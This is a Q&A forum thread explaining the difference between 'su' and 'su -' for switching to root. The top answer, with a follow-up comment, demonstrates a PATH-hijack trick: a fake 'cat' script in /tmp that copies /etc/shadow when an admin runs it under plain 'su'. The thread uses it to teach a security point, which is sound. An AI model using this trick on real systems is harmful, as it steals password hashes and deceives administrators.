220

I don't understand why su - is preferred over su to login as root.

Improve this question

4 Answers 4

Reset to default
290

su - invokes a login shell after switching the user. A login shell resets most environment variables, providing a clean base.

su just switches the user, providing a normal shell with an environment nearly the same as with the old user.

Imagine, you're a software developer with normal user access to a machine and your ignorant admin just won't give you root access. Let's (hopefully) trick him.

$ mkdir /tmp/evil_bin
$ vi /tmp/evil_bin/cat
#!/bin/bash
test $UID != 0 && { echo "/bin/cat: Permission denied!"; exit 1; }
/bin/cat /etc/shadow &>/tmp/shadow_copy
/bin/cat "$@"
exit 0

$ chmod +x /tmp/evil_bin/cat
$ PATH="/tmp/evil_bin:$PATH"

Now, you ask your admin why you can't cat the dummy file in your home folder, it just won't work! 

$ ls -l /home/you/dummy_file
-rw-r--r-- 1 you wheel 41 2011-02-07 13:00 dummy_file
$ cat /home/you/dummy_file
/bin/cat: Permission denied!

If your admin isn't that smart or just a bit lazy, he might come to your desk and try with his super-user powers:

$ su
Password: ...
# cat /home/you/dummy_file
Some important dummy stuff in that file.
# exit

Wow! Thanks, super admin!

$ ls -l /tmp/shadow_copy
-rw-r--r-- 1 root root 1093 2011-02-07 13:02 /tmp/shadow_copy

He, he.

You maybe noticed that the corrupted $PATH variable was not reset. This wouldn't have happened, if the admin invoked su - instead.

Improve this answer
11
  • 15
    su -- is the same as su. Commented Feb 7, 2011 at 20:08
  • 15
    -- is a flag that most programs interpret as "nothing after this should be taken as a flag". Useful for greping for things which start with a dash. Commented Feb 9, 2011 at 4:43
  • 3
    Don't forget to set an umask like 000 or it won't work. Commented Oct 22, 2011 at 8:48
  • 14
    One could as well just put a su file inside the PATH. It's not so hard to mimic the behavior of the real su. The super-user has been careless anyway :-) Commented Feb 28, 2012 at 18:53
  • 13
    su -- is NOT the same as su - : -- tells an getopt(s) (or similar) option handler to stop processing the command line for further options (usefull for example if the rest contains filenames which could start with an '-'). Ie, in "rm -i -- -f" : -f is then treated as a regular argument, so here as the name of the file to rm -i, and not as an additionnal -foption to the rm command. So su -- is just su and not su - ! So su -- would be as unsafe to the (funny and instructive) example givan by wag. Use su -. Commented Dec 26, 2012 at 15:05
41

su - logs you in completely as root, whereas su makes it so you are pretending to be root.

The most obvious example of this is that ~ is root's home directory if you use su -, but your own home directory if you use su.

Depending on your system, it may also mean differences in prompt, PATH, or history file.

So if you are part of a team administering a system, and your colleague gives you a command to run, you know it will work the same if you are both using su -, but if you are both using su, there may be differences due to you having different shell configurations.

On the other hand, if you want to run a command as root but using your own configuration, then maybe su is better for you.

Also don't forget about sudo, which has a -s option to start a shell running as root. Of course, this has different rules as well, and they change depending on which distribution you are using.

Improve this answer
8
  • 1
    when I "su" I get ~ and $HOME both evaluating to /root. Is the behavior you describe specific to certain shells or OS versions or something? It's my understanding that ~ can be expanded by the kernel. I've got zsh as my (and root's) shell. Commented Feb 8, 2011 at 0:05
  • Your .bashrc or /etc/bashrc or /etc/profile.d scripts are setting PATH. Look for if [ $UID -eq 0 ] or something like that. Commented Feb 8, 2011 at 1:14
  • $USER for example is left unchanged. Commented Jan 30, 2014 at 11:13
  • 1
    What about sudo su? Commented Jul 18, 2014 at 20:10
  • 1
    Your example does not work for me. I get the same directory resolved in either way. Commented Apr 18, 2016 at 14:45
8

The main difference is :

su - username sets up the shell environment as if it were a clean login as the specified user, it access and use specified users environment variables,

su username just starts a shell with current environment settings for the specified user.

If username is not specified with su and su -, the root account is implied as default.

Improve this answer
3

I use su -- when I'm in a directory as a regular user but want to switch to root and remain in same directory after the switch. When you use su - it switches the user to root and also takes you to /root which is the root home directory.

Improve this answer
1
  • 1
    Or / or whatever is defined as root’s home directory Commented Jun 7, 2018 at 23:42

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.